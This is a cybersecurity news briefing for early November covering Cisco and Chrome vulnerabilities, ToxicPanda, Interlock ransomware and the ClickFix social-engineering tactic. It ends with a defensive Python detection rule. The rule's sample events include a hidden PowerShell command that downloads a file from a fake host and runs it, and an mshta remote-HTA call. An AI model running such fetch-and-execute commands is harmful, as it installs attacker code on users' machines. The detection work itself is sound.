Cyber Security Briefing, 1 - 8 November
Cisco fixes bug in URWB access points that allows root command execution
Cisco has fixed a critical vulnerability in Ultra-Reliable Wireless Backhaul (URWB) access points that allows command execution with root privileges. This flaw, identified as CVE-2024-20418 and with a CVSSv3 of 10.0 according to the vendor, allows unauthenticated actors to perform low-complexity command injection attacks without requiring user interaction.
According to Cisco, the cause is improper validation in the web management interface of the unified industrial wireless software, and a successful exploit would allow arbitrary commands to be executed on the affected device's operating system. The vulnerability affects Catalyst IW9165D, IW9165E, and IW9167E access points when operating in URWB mode.
Cisco states that no exploit code is publicly available and that no evidence of ongoing attacks has been detected. Administrators can verify whether URWB mode is active by running the "show mpls-config" command. If the command is not available, the URWB mode of operation is disabled and the device is not affected by this vulnerability.
Two serious vulnerabilities fixed in Chrome
Google has released a new update to its Chrome browser that fixes two high-severity vulnerabilities discovered by anonymous researchers. The flaws, identified as CVE-2024-10826 and CVE-2024-10827, both with a CVSSv3 score of 8.8 according to CISA, are use-after-free bugs in the Google Chrome Family Experiences and Serial components, respectively. An attacker could exploit these memory management flaws.
Both vulnerabilities have been fixed by updating the Stable Channel to version 130.0.6723.116/.117 for Windows and Mac and to version 130.0.6723.116 for Linux. The manufacturer has announced that the update will be distributed to users over the coming days or weeks, and the full list of changes is available in the Chrome change log.
ToxicPanda: new malware targeting Android
Researchers at Cleafy have published an analysis reporting the discovery of new malware targeting Android devices that enables threat actors to conduct fraudulent banking transactions. The malware, dubbed ToxicPanda, is believed to have been created by Chinese-speaking actors and shares similarities with another Android malware called TgToxic: the two have 61 commands in common.
According to the researchers, ToxicPanda's main goal is to initiate money transfers from compromised devices via account takeover (ATO), using a technique known as ODF (on-device fraud). It is distributed through fraudulent websites that impersonate well-known applications such as Google Chrome, Visa and 99 Speedmart. Most attacks have been reported in Italy, followed by Portugal, although cases have also been identified in Hong Kong, Spain and Peru; the victims are retail banking users.
New analysis of Interlock ransomware
The Cisco Talos Intelligence team has released new details about the Interlock ransomware, which has been active since at least September 2024. Interlock may have been created by the operators of the Rhysida ransomware, given the similarities between the techniques and encryption binaries of the two groups.
During the incident in which Interlock was detected and analyzed by the Cisco Talos team, the attacker gained initial access via a fake Google Chrome update downloaded from a compromised legitimate URL. That file was an executable containing a Remote Access Trojan (RAT) which, in turn, downloaded a credential stealer and a keylogger. Finally, the attacker deployed the ransomware binary, which masqueraded as a legitimate file, encrypted the files on the infected devices and then demanded a ransom from the victims.
New ClickFix tactic detected
Sekoia researchers have analyzed a new tactic called ClickFix, whereby malicious actors use fake Zoom and Google Meet pages to distribute malware using legitimate tools. Specifically, users are shown a fake error message for a problem with the microphone or headset, prompting them to press “Windows + R” to open the Run dialog box. After this, they are instructed to paste and execute malicious commands, usually related to PowerShell scripts to download and execute payloads. The technique exploits the appearance of legitimacy to reduce the chances of detection. To infect macOS devices, a .dmg file is downloaded that executes the malware directly.
For Windows, two main infection chains are used: one uses a malicious Mshta command, while the other uses PowerShell. In order to detect and prevent this malicious activity, it is recommended to monitor processes such as mshta.exe or bitsadmin.exe started by Explorer.exe, as well as suspicious network requests made by these processes, and to use EDR systems to identify these patterns.
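The detection guidance above (mshta.exe or bitsadmin.exe spawned by Explorer.exe, plus suspicious arguments) is easy to turn into a rule. The following Python, added here as an illustration and not part of the Sekoia analysis or the newsletter, runs that rule over constructed Sysmon-style process-creation events; the event field names, sample paths and hostnames are assumptions.

```python
import re

# Constructed Sysmon-style process creation events for illustration (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://fake-meet.example/fix.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://fake-zoom.example/p | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Binaries the briefing names as worth watching under explorer.exe, plus PowerShell,
# which ClickFix also abuses but which users legitimately start from explorer.exe.
ALWAYS_SUSPICIOUS = {"mshta.exe", "bitsadmin.exe"}
NEEDS_CONTEXT = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
EVASION_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|\biex\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event):
    """Return the reasons an event matches the ClickFix pattern, or [] if it does not."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return []  # a command pasted into the Run dialog is a child of explorer.exe
    image, cmd = basename(event["Image"]), event["CommandLine"]
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / policy bypass / iex")
    if image in ALWAYS_SUSPICIOUS:
        reasons.insert(0, f"{image} spawned by explorer.exe")
    elif image in NEEDS_CONTEXT and reasons:
        reasons.insert(0, f"{image} spawned by explorer.exe with suspicious arguments")
    else:
        return []  # benign binary, or PowerShell with nothing else suspicious
    return reasons


def find_clickfix_candidates(events):
    """(index, reasons) for every event that matches the rule."""
    return [(i, clickfix_reasons(e)) for i, e in enumerate(events) if clickfix_reasons(e)]
```

In a real deployment the same rule would be fed from the EDR's process telemetry and correlated with the network requests those processes make, as the text recommends.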